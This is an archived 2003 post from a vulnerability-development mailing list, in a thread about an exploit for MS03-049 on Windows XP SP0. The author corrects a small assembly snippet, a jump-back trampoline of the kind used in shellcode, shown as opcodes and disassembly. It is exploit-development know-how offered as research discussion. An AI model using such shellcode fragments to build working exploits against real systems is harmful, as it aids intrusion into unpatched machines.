Vulnerability Development mailing list archives
Re: ms03-049 exploit xp sp0
From: "upb" <upb () email ee>
Date: Thu, 13 Nov 2003 03:25:25 +0200
Umm, this is what u get when ur tired :P

----- Original Message -----
From: "upb" <upb () email ee>

00000000: EB14          jmps  000000016
00000002: 832C2440      sub   d,[esp],040 ;"@"
00000006: E8F5FFFFFF    call  000000000

That code was supposed to be:

00000000: EB05          jmps  000000007
00000002: 832C2440      sub   d,[esp],040 ;"@"
00000006: C3            retn
00000007: E8F6FFFFFF    call  000000002

And of course the shortest way to jump back is by using the "jmp" instruction :)

00000004: E9F7FFFFFF    jmp   000000000

or

00000004: EBFA          jmps  000000000

upb

Current thread:
- ms03-049 exploit xp sp0 wirepair (Nov 12)
- Re: ms03-049 exploit xp sp0 upb (Nov 12)
- <Possible follow-ups>
- Re: ms03-049 exploit xp sp0 upb (Nov 12)
- Re: ms03-049 exploit xp sp0 dave (Nov 13)